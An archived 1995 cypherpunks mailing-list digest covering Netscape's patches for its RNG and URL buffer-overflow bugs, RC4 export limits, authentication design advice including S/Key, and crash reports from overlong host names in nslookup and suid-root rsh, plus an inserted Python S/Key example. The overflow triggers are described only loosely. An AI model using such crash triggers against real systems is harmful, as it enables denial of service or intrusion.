---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 27 Sep 95 21:13:48 PDT
To: cypherpunks@toad.com
Subject: Re: Using sound cards to accelerate RSA?
Message-ID: <ac8f6da90502100459f8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:39 PM 9/27/95, Simon Spero wrote:
>Somebody mentioned the possibility of using the a/d stage of a sound card
>as a source of random bits, and that brought a thought back to mind:
>given that a lot of sound cards are now shipping with DSP chips on board,
>has anyone written any code that uses the cards DSP to accelerate RSA
>processing?
>
>Maybe there's a mass market market for a crypto-blaster- an RNG, 3 or 6
>DES chips, and a DSP. It would make for a killer linux based SHTTP server...

But I don't think Soundblaster-class DSP performance is especially
impressive compared to where the market is going with Pentiums. (AMD and
Cyrix have both announced plans to exit the 486 market as rapidly as they
can--and of course Intel has been doing that for some time already.)

It made more sense 2-3 years ago, and a couple of people were talking about
finding ways to use modems and DSP cards to accelerate crypto functions.
(Paul Rubin, for example, was looking at Trailblazer modems...)

Another problem with such solutions is that they often get marginalized, or
left on the sidelines. This has to do with lots of things, including the
percentage of people who have various add-on cards, the power of their main
CPUs, etc. (Many things to touch on here. Apple used a DSP chip in their
840av and 660av models, but various problems in supporting these chips
cropped up, and Apple phased them out in favor of PPC-only configurations.
Intel is pushing "native signal processing" to both sell faster CPUs and
ease the programming efforts in supporting DSP chips. Time will tell.)

For other reasons, software solutions are generally preferable to
hardware-dependent solutions.

Finally, few crypto applications seem to be limited very much by speed at
this time. Audio and video apps, of course, put a strain on processing
power, and this is where DSP capabilities make the most difference,
probably.

Finally (for real), the effort in supporting DSP chips could probably
better be spent elsewhere, given the small effects of a slight increase in
speed. Getting PGP more widely integrated into popular programs would seem
to me to be a bigger win than in reducing the time to encrypt a message
from 3.2 seconds to 1.9 seconds.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Wed, 27 Sep 95 21:42:07 PDT
To: tjic@OpenMarket.com
Subject: Re: Timothy C. May: Mini-mailbombs and Warning Letters
Message-ID: <9509280438.AA23997@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 	but the key was not there.  Please mail me your key.  Thank you.
> 
> 
> If anyone has a constructive suggestion as to how this mail could be
> changed to convey more information or to be less "threatening", please
> mail me.
> 
Sure, I found the above offensive.  It comes across in exactly the same
tone as a cop saying, "Please step away from the car."  I know it's silly,
but sometimes Please just isn't enough.  The simple change:

      but the key was not there.  Could you please mail me your key?  Thanks.

works miracles:)  The tone on the rest of it was nice.  You have to be careful
with imperatives.  They usually sound mean...even with a please at the front.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Marcel van der Peijl" <bigmac@digicash.com>
Date: Wed, 27 Sep 95 13:48:36 PDT
To: cypherpunks@toad.com
Subject: Sorry or something
Message-ID: <199509272048.VAA02445@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain


In case it was not clear: my earlier post really was not a lawsuit 
threat. It seems it was (mis)interpreted this way by some people.

Also, the original author did not post the article but someone he 
sent it to. I'm sure the author did not intend to post the text as is 
but first give us a fair chance of defending ourselves.

#include <stddisclaimer.h> 
"My opinions and reactions do NOT represent the official DigiCash 
standpoint."

// Marcel van der Peijl, DigiCash bv, http://www.digicash.com/~bigmac/
// "If you had to tell the Whole Truth, you'd never shut up."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Wed, 27 Sep 95 22:02:04 PDT
To: cypherpunks@toad.com
Subject: Looking for advice.
Message-ID: <9509280458.AA24011@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


For two programs communicating via TCP/IP and exchanging authentication
information, I want to make sure that the authentication info, (user's
name and password,) doesn't pass in the clear.  I can think of a few
ways to handle this.  

1) Encrypt via shared key using symmetric encryption.
   This works but key management is a problem.
2) Encrypt via public keys using public key encryption.
   There's licensing issues, and how do you generate public and private
   pairs for all of the programs?  That could be a lot of primes!
3) The "server" could keep user names and passwords stored as hashed values.
   That way the "client" could do a hash (MD5?) before sending it.
   This has the drawback of the server not having access to the unhashed
   values...if it needs that access this method won't work.

What are other possibilities?  What are the answers to my questions and
issues above?  Can you help?

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karlton <karlton@netscape.com>
Date: Wed, 27 Sep 95 22:16:58 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: Patch release of Netscape available
In-Reply-To: <199509280458.AAA27626@clark.net>
Message-ID: <306A2FA6.41C6@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Ray Cromwell wrote:
>   Does this release patch both the RNG and the overflow bugs or just
> the RNG?

Both. We fixed the overflow bugs we could find, including all the
examples mailed to cypherpunks.

PK
--
Philip L. Karlton			karlton@netscape.com
Principal Curmudgeon			http://www.netscape.com/people/karlton
Netscape Communications Corporation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Wed, 27 Sep 95 15:28:27 PDT
To: cypherpunks@toad.com
Subject: Re: Security Update news release
In-Reply-To: <199509261941.MAA02266@ix6.ix.netcom.com>
Message-ID: <44cj4k$oee@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509261941.MAA02266@ix6.ix.netcom.com>, stewarts@ix.netcom.com (Bill Stewart) writes:
> >>Do the new versions use PGP's randseed.bin? If Netscape even only looks at
> >>data used to keep PGP secure,  Netscape will be banned from my computer
> >>and every computer I am responsible for. -- For good.
> >
> >This is the second person who has expressed this sentiment. I don't
> >understand it. If you believe that the possibility of randseed.bin
> >getting out is dangerous, then why do you leave it online? Do you
> >really trust every piece of software you run, every piece of software
> >that can possibly access your machine over the net, to not look at
> >that file?
> 
> It makes a little bit of sense - I'm not aware of any software,
> other than PGP and now Netscape, that _explicitly_ goes after randseed.bin,
> though of course just about anything can try.  

  Netscape will not read randseed.bin.  I've changed it to use an environment
variable that names a user specified file to read.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Erik E. Fair"  (Time Keeper) <fair@clock.org>
Date: Wed, 27 Sep 95 22:40:30 PDT
To: Bill Stewart <jlasser@rwd.goucher.edu>
Subject: Re: "Notes" to be Eclipsed by "Netscape"
Message-ID: <v02110101ac8fb13b4275@[17.255.9.110]>
MIME-Version: 1.0
Content-Type: text/plain


At 15:21 9/27/95, Bill Stewart wrote:

>Notes was a PC network reimplementation of PLATO, the system that also inspired
>notesfiles, a distant cousin of Netnews (though I'm not sure if netnews was
>originally inspired by PLATO or not...)  Netnews assumes that articles are
>going to propagate for a while and then be trashed; notesfiles assumes you're
>building a knowledge base that sticks around.  (This transitoriness has allowed
>netnews to scale to its current N*100MB/day of trash :-)

Netnews was the old "msgs" program on serious steroids - the thing everyone
was supposed to run in their .login (or .profile) scripts to get
system-wide announcements. My bet is that msgs was inspired by the
TOPS-20/ITS equivalents at MIT. Netnews subsequently underwent relatively
rapid forced evolution in its early days to meet the scaling demands of the
UUCP network, and the Internet of that time (~1983).

The "notesfiles" system from UIUC that Rob Kolstad and Ray Essick wrote was
not so much a distant cousin of NetNews as it was a similar system designed
to solve the same problem (distributed message-based computer
conferencing); I would argue that NetNews had the better transports and
backends, but notesfiles was one or two up on NetNews in UI features
(message threads, etc). The two were sufficiently close that (bad) gateways
were written to move messages from one system to the other.

With any luck, the next round of NetNews user interfaces will remove all of
the UI advantages of notesfiles - the hooks have always been there, but
writing good UI's hard work, and most NetNews hackers (me included) have
had more fun/luck/interest in hacking the transport level to be ever more
slightly efficient.

>AT&T Network Notes is a joint AT&T/Lotus project that uses AT&T's public IPX
>network to support Notes on; I think it's now rolled out and accepting customers,
>but it was mostly in press-release stage while I was at AT&T.

I had the impression from what I read that this was going to be an IPX WAN,
and that after announcing this Brave New Service, the partners discovered
just how poorly IPX behaves on a WAN, and so have backed out to Notes on IP
for this thing. I haven't heard much about it since, but I'd be surprised
to find AT&T being foolish enough to try and operate an IPX WAN.

>Notes does have encryption, using RSA and I think RC4; I'm not sure if they
>do the 40 bits exportable/ 128 domestic bit or just use 40 bits.  Don't know
>about overflow kinds of bugs; the bugs I've heard about were more problems
>integrating with Cc:Mail :-)

Lotus is indeed one of RSA's licensees; I remember reading that in the WSJ
at about the same time that Apple became one.

I still place my message-based distributed collaboration bets on NetNews
technology, or some obvious derivative of it.

Erik Fair







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Wed, 27 Sep 95 15:45:42 PDT
To: cypherpunks@toad.com
Subject: Re: Golden Coy Freeh
In-Reply-To: <199509251253.IAA07006@pipe4.nyc.pipeline.com>
Message-ID: <44ck51$q0n@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509251253.IAA07006@pipe4.nyc.pipeline.com>, jya@pipeline.com (John Young) writes:

>    Mr. Freeh wisely did not say whether the F.B.I. agents were
>    able to decipher the encrypted files seized in the
>    investigation. It would be foolhardy, from a
>    law-enforcement perspective, to tip one's hand.

  Maybe someone should file an FOIA request on this...

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Wed, 27 Sep 95 16:39:53 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape for Linux?
In-Reply-To: <445hej$h03@tera.mcom.com>
Message-ID: <44cnah$q0n@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509251135.HAA13693@frankenstein.piermont.com>, perry@piermont.com (Perry E. Metzger) writes:

> Jeff Weinstein writes:
> > > ... would be nice if we could get 128 bit keys, though ... (hint,
> > > hint).
> > 
> > We are working this issue with the government.  As soon as we can
> > make it available for download we will.

> In other words, we will never see it in our lifetimes -- the
> bureaucreeps aren't known for promoting the spread of strong crypto.

  Where did I imply that if the govt. ignored us or said no that we
would meekly go away with tail between legs?

> By the by, are you guys going to be taking any action vis a vis the
> discovery of weak keys in RC4?

  We are talking to RSA about this, since our crypto code is based
on BSAFE code we got from them.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 27 Sep 95 20:44:36 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <9508278122.AA812233405@ax.asc-yf.wpafb.af.mil>
Message-ID: <199509280344.XAA25414@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Ray Cromwell writes:
# I've found a Netscape bug which I suspect is a buffer overflow and 
# may have the potential for serious damage. 

Mike D. writes:
> Is there any way to avoid/prevent this problem by changing options in 
> NetScape?

I'm afraid there's no way to completely eliminate the problem without getting
the next version of Netscape. There's no apparent way to increase the size of 
the buffer allocated for a URL at runtime. Of course, that would only be of
limited use. Certainly there's no way for a user to really fix the problem by
adding a check on the length of the URL.

However, a certain amount of common sense will go a long way in avoiding ugly
incidents. To put it simply, "look before you leap". Before you click on a
link, look at the status bar at the bottom of the Netscape window (in the
Unix version at least) that displays the URL of the link under the pointer.
To be safe, if it's too long to fit entirely in the status bar, view the
source of the current page to find the complete URL. (Note that when a URL is
too long to fit completely in the status bar, a middle portion of it is elided
with "...")

Also, if the link is labelled "Don't click here !" like one on my homepage,
don't click there ! :}

-Futplex <futplex@pseudonym.com>
"What if you knew her, and found her dead on the ground ?
 How can you run when you know ?" -Neil Young



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: goedel@tezcat.com (Dietrich J. Kappe)
Date: Wed, 27 Sep 95 22:40:32 PDT
To: cypherpunks@toad.com
Subject: Netscape seems to fix the overflow bug
Message-ID: <v01510100ac8ff3256300@[206.1.161.4]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Simple testing with the Netscape update would seem to indicate that the
overflow bug has been fixed. How about the RNG hole?



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBgAwUBMGpDRHIf3YegbdiBAQFf4wJWIaseQP3CL4V7aEs8HMmU4MB2jYVpyLhx
C4ER+a9Ho9bIbaipATtuL+E0oaq77AEeaB7TMQBl+upzcttifH9Y9hANYUQ7Q8vS
jkRa
=wN48
-----END PGP SIGNATURE-----

Dietrich Kappe | Red Planet    http://www.redweb.com
Red Planet, LLC| "Chess Space" | "MS Access Products" |  PGP Public Key
1-800-RED 0 WEB|    /chess     |       /cobre         | /goedel/key.txt
Web Publishing | Key fingerprint: 8C2983E66AB723F9 A014A0417D268B84






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Wed, 27 Sep 95 21:58:52 PDT
To: karlton@netscape.com (Phil Karlton)
Subject: Re: Patch release of Netscape available
In-Reply-To: <14494.812260307@ghoti.mcom.com>
Message-ID: <199509280458.AAA27626@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> On ftp://ftp.netscape.com/pub/netscape, you can find the new UNIX,
> Macintosh and Windows executables. Note that these executables only
> support 40-bit RC4. We are working out a mechanism to be able to
> upgrade the 128-bit versions that is acceptable to the U.S.
> government.

  Does this release patch both the RNG and the overflow bugs or just
the RNG?

-Ray



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Wed, 27 Sep 95 22:58:13 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Problems with netscape patch and W95
Message-ID: <Pine.ULT.3.91.950928005444.16671A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I thought I'd post this here since there is a netscape dude hanging 
around :-)

I downloaded the patch for the 32-bit windoze version and couldn't get it 
installed.  I had the old installation in the default C:\Program 
Files\Netscape\Navigator (with the space in the directory name), but 
every incarnation I tried, including the Progra~1 8.3 name couldn't be 
found.  I finally just stripped out the old and reinstalled the new.  
Annoying but functional.  Please double check this in any future patches, 
or better yet, put in a search utility that finds it for you, something 
like "Netscape was found in C:\Foo\Bar.  Patch here?"  If no, then search 
more until exhausted.

Sorry for the non-CP traffic, just trying to reach the right people the 
fastest. :-)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMGoddDokqlyVGmCFAQFQwAP/ZbC46g8gdZ1l+QEXjKz7MtLW/WNNlBGI
CCO8A0pmescH1uP9vfSMt2gfuR59DMHsVNSjloY0AO0LWSqLSnlHO4JOMajhysOZ
hnpL63BtrR50o3RBoZ8awqx0h+LWjm3U9gh9m0xcsq3vB67a7VW3m9CpJ3yRWQVJ
usZ7HyjcHEE=
=mva0
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GED/J d-- s:++>: a-- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+
K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++(+)>$ Y++ PGP++ t- 5+++ X++
R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y++**
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 27 Sep 95 22:59:17 PDT
To: cypherpunks@toad.com
Subject: Mathematics Library Plus -- Interactive Math Tutorial (fwd)
Message-ID: <199509280612.BAA07163@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


Forwarded message:
From benjie@relay.net Thu Sep 28 00:35:53 1995
Message-Id: <m0syBKR-0005j2a@hip-hop.hh.sbay.org>
Date: Wed, 27 Sep 95 22:16 PDT
Sender: benjie@relay.net (Cyber Robot)
From: coe@best.com (C.O.E)
Subject: Mathematics Library Plus -- Interactive Math Tutorial
Designated-To: Internet Amateur Mathematics Society
Replied-From: Internet Amateur Mathematics Society
Precedence: bulk
Sender: iams@hh.sbay.org (Internet Amateur Mathematics Society)
X-Info: email to listserv@hh.sbay.org with "FAQ iams" in the message
X-Ignore: iams  Ignore this line. It's a mailing-list-loop detector.


The Mathematics Library Plus Series include five (5) CD-ROM titles
featuring Algebra, Calculus, Statistics, Geometry, and Trigonometry.
Each CD-ROM title is a compendium of scientific and mathematical 
equations. Each listing explains the fundamental principle(s), 
corollaries of the equation and its sample usage. 

Each CD-ROM title is a step-by-step and easy-to-follow interactive 
tutorial software for students from high school to college levels. 
A comprehensive self study guide with online text references and a 
useful resources for pre-test practices. Hundreds of problems ranging
from easy to difficult and come with interactive hints and solutions. 

For more info, please visit

	http://www.coe.com/ari/

To download a copy of the MLP sampler, use anonymous ftp to

	ftp.coe.com

Under the directory,

	pub/outgoing/mlp


Thank you.

info@coe.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cort <cort@ecn.purdue.edu>
Date: Wed, 27 Sep 95 23:13:18 PDT
To: cypherpunks@toad.com
Subject: Re: NIS library code exposure (Unix network exposure)
In-Reply-To: <14539.812260953@ghoti.mcom.com>
Message-ID: <199509280613.BAA21957@en.ecn.purdue.edu>
MIME-Version: 1.0
Content-Type: text


[....]

> Do you have any daemons that run as root and do networking? Are you
> sure that all of them check the length of the host name before passing
> it to gethostbyname?

[....]

On Linux:
ping [huge host name] works
ftp [huge host name] works
finger [huge host name] works
nslookup [huge host name] ... CRUNCH (Segmentation fault)



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 28 Sep 95 01:39:32 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Another Netscape Bug (and possible security hole)
Message-ID: <199509280839.BAA02982@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:44 PM 9/27/95 -0400, Futplex <futplex@pseudonym.com> wrote:
>However, a certain amount of common sense will go a long way in avoiding ugly
>incidents. To put it simply, "look before you leap". Before you click on a
>link, look at the status bar at the bottom of the Netscape window (in the
>Unix version at least) that displays the URL of the link under the pointer.

One of the later versions of the hack hid the large href inside the page
as an IMG; the URL for the page looked mostly harmless (other than being
named "bug2" or "hack2" :-); I think it was Ray's.  Blowed up real good.

"Push to test" ..... "Release to detonate"


>"What if you knew her, and found her dead on the ground ?
> How can you run when you know ?" -Neil Young
Well, Nixon's not coming any more, but this is it, we're on our own...
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 28 Sep 95 01:40:08 PDT
To: patrick@Verity.COM (Patrick Horgan)
Subject: Re: Looking for advice.
Message-ID: <199509280839.BAA03015@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:58 PM 9/27/95 -0700, you wrote:
>For two programs communicating via TCP/IP and exchanging authentication
>information, I want to make sure that the authentication info, (user's
>name and password,) doesn't pass in the clear.  I can think of a few
>ways to handle this.  
>
>1) Encrypt via shared key using symmetric encryption.
>   This works but key management is a problem.
>2) Encrypt via public keys using public key encryption.
>   There's licensing issues, and how do you generate public and private
>   pairs for all of the programs?  That could be a lot of primes!
>3) The "server" could keep user names and passwords stored as hashed values.
>   That way the "client" could do a hash (MD5?) before sending it.
>   This has the drawback of the server not having access to the unhashed
>   values...if it needs that access this method won't work.

[Perry Metzger often has good comments about the order of doing things in.]

Are you planning to encrypt your sessions, or not?  What threats are you 
worried about?  What threats are you aware of but not worried about?
How much opportunity do the users of the programs have to set up communications
beforehand?  Is this one-shot, or will a given client and server do a lot
of repeat business?  Are you concerned about privacy from machine to machine,
or also from user to user?  Are you worried about man-in-the-middle attacks?
Are you worried about protecting the user's name, or only their password?
Are you willing to buy hardware, or do you want software-only?
How critical is setup speed?  How slow are your processors?
Are you worried about your TCP sessions getting hijacked once you've
done the authentication?

For some applications, Diffie-Hellman is a good answer - the basic protocol
doesn't do authentication, but does do secure key negotiation as long as you
either don't have a man-in-the-middle or else have authentication such as
digital signatures on your key-parts.  Once you've created a shared key
by DH, you can then use it to encrypt your session, or at least exchange 
passwords securely.

If you're willing to buy a bit of hardware, there are cryptographic smartcards
that let you generate time-varying one-time passwords; some of them are decent.

Phil Karn's S/Key technology (ftp-able from and I think patented by Bellcore)
takes a nice approach using hash functions - let h^n(m) denote message m cranked
through hash function h n times, = h(h(h(...(h(m))...))), where h is a secure
one-way hash like MD4 that's tolerably fast.  To set up, calculate h^n(m),
and store it in the server's password file.  When you log in for the first time,
the server tells you n-1, you calculate h^(n-1)(m), send it as your password,
the server hashes it to get h^n(m), and compares it with the saved value.
If it works, the server now saves h^(n-1)(m); the next time it'll ask you for
n-2, you give it h^(n-2)(m), the server hashes to get h^(n-1)(m), etc.
Obviously you've got to reset after n-1 uses.

If you have an environment where you can store secret keys safely on the server,
you can use secret-key challenge-response methods effectively - the server
sends a random number, and you send back the number, encrypted, or there are
variants where you modify the number by 1, with or without timestamps,
and maybe the server sends the number encrypted also.  If you can't secure
a general-use machine, but are able to secure a machine that just does
authentication and keep it locked in a room with only network access and power,
pretty soon you've invented Kerberos.

Do you need separate public keys for each application X user?  Depending on what
you're trying to authenticate, you could have a public key for the application
or even just the machine it runs on, and send passwords encrypted with that;
again there are variants with timestamps, random challenges, etc., to deal
with issues like replay attacks.  Or maybe you can have the server issue
random numbers as challenges that you sign with your registered public key.
If you do that, though, better have the server sign with _its_ public key also,
since you'd probably rather not just go signing any random number anybody
hands you.  And what if there's a man in the middle there helping you log on...?
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
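
The S/Key hash-chain login described in the message above, as an added example that is not part of the original post or of the S/Key distribution. SHA-256 stands in for MD4, and the names `h_n`, `SKeyServer`, `client_response` and `run_demo`, along with the sample secret, are assumptions made for illustration.

```python
import hashlib
import hmac


def h(data: bytes) -> bytes:
    """One application of the one-way hash h (SHA-256 substituted for MD4)."""
    return hashlib.sha256(data).digest()


def h_n(secret: bytes, n: int) -> bytes:
    """h^n(m): the secret m cranked through h n times."""
    if n < 0:
        raise ValueError("n must be non-negative")
    value = secret
    for _ in range(n):
        value = h(value)
    return value


def client_response(secret: bytes, k: int) -> bytes:
    """What the user sends when the server asks for iteration k."""
    return h_n(secret, k)


class SKeyServer:
    """Keeps only h^count(m) and count; the secret m never reaches it."""

    def __init__(self, initial: bytes, n: int):
        self.stored = initial  # h^n(m), computed on the user's side at setup
        self.count = n

    def challenge(self) -> int:
        """Tell the client which iteration to send next (count - 1)."""
        if self.count <= 1:
            # Asking for iteration 0 would mean asking for m itself.
            raise RuntimeError("chain exhausted: reset with a new h^n(m)")
        return self.count - 1

    def login(self, response: bytes) -> bool:
        """Hash the response once and compare it with the saved value."""
        if self.count <= 1:
            return False
        if not hmac.compare_digest(h(response), self.stored):
            return False
        # Success: the response becomes the new saved value, so the same
        # bytes hashed once more no longer match and a replay fails.
        self.stored = response
        self.count -= 1
        return True


def run_demo(n: int = 5) -> dict:
    secret = b"constructed demo pass phrase"  # constructed sample value
    server = SKeyServer(h_n(secret, n), n)

    first = client_response(secret, server.challenge())
    results = {
        "first_login": server.login(first),
        # An eavesdropper resending the captured password is rejected.
        "replay": server.login(first),
        # A copy of the server's password file entry does not log in either.
        "stolen_server_value": server.login(server.stored),
    }

    uses = 1
    while True:
        try:
            k = server.challenge()
        except RuntimeError:
            break
        assert server.login(client_response(secret, k))
        uses += 1
    results["uses_before_reset"] = uses  # n - 1 logins, then reset
    return results


if __name__ == "__main__":
    print(run_demo())
```
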





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cort <cort@ecn.purdue.edu>
Date: Thu, 28 Sep 95 00:11:51 PDT
To: cypherpunks@toad.com
Subject: Re: NIS library code exposure (Unix network exposure)
In-Reply-To: <199509280613.BAA21957@en.ecn.purdue.edu>
Message-ID: <199509280711.CAA27138@en.ecn.purdue.edu>
MIME-Version: 1.0
Content-Type: text


> [....]
> 
> > Do you have any daemons that run as root and do networking? Are you
> > sure that all of them check the length of the host name before passing
> > it to gethostbyname?
> 
> [....]
> 
> On Linux:
> ping [huge host name] works
> ftp [huge host name] works
> finger [huge host name] works
> nslookup [huge host name] ... CRUNCH (Segmentation fault)
> 

Ouch.....!

On Linux:
rsh [huge host name] crashes bad... (file system now corrupted)

The above claims for ping, ftp and finger may be dependent on how
huge is huge.  rsh took a very large number (I'm guessing 10 lines,
800 characters) before crashing.  Huge was not this huge for the
previous tests.

rsh is usually suid root.

I must quit experimenting now.... and repair my system.

Crypto relevance:  little....  some hack relevance, lots of general
                   system/network security relevance

Cort.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Weinstein" <jsw@netscape.com>
Date: Thu, 28 Sep 95 03:52:26 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: It's Wednesday
In-Reply-To: <Pine.SUN.3.91.950928064141.6955B-100000@panix.com>
Message-ID: <9509280348.ZM151@tofuhut>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 28,  6:43am, Duncan Frissell wrote:
> Subject: Re: It's Wednesday
> 
> On 28 Sep 1995, Jeff Weinstein wrote:
> 
> >   Sure.  It's on ftp://ftp.netscape.com/pub/netscape.  It has been there
> > for several hours.
> 
> Late Wednesday.  Of course whoever created the directories/files had his 
> machine date set to *1994* so some of same are date stamped Tuesday 
> September 27 1994.

  They were put up some time between 4 and 6pm PST.  As far as I can
tell, all of the files are dated in 1995.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 28 Sep 95 01:51:58 PDT
To: cypherpunks@toad.com
Subject: No Subject
In-Reply-To: <199509280611.HAA02214@utopia.hacktic.nl>
Message-ID: <199509280851.EAA20863@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Whoever you are, could you get this shit out of Cypherpunks? This
list is about cryptography, not your ignorance of economics or how
banking works.

Anonymous writes:
> that they do. 95% of all "cash" transactions in the U.S. are by check.
> Checks are thus effectively also currency. The banker creates the so-
> called "loan" by writing a check or deposit slip, not against actual
> money, but against your promise to pay back the loan. The only cost to the
> bank is the paper, ink, and a few dollars in salaries and office costs for
> each transaction. It is "check-kiting" on an enormous scale! The profits
> are enormous as shown below.
[...]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Wed, 27 Sep 95 22:41:42 PDT
To: cypherpunks@toad.com
Subject: Re: WSJ on Netscape Hole 3
In-Reply-To: <v02120d06ac8f74e7796e@[199.2.22.120]>
Message-ID: <44dcgs$b36@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <v02120d06ac8f74e7796e@[199.2.22.120]>, cman@communities.com (Douglas Barnes) writes:
> As for objections about how worthwhile this is, it's pretty clear
> that a patch will be available for this problem before we can finish
> and publicize an exploit. This is not, however, the last piece of
> network software that will contain problems of this sort, and it is
> a good idea to build up expertise in this area. I'd also suggest going
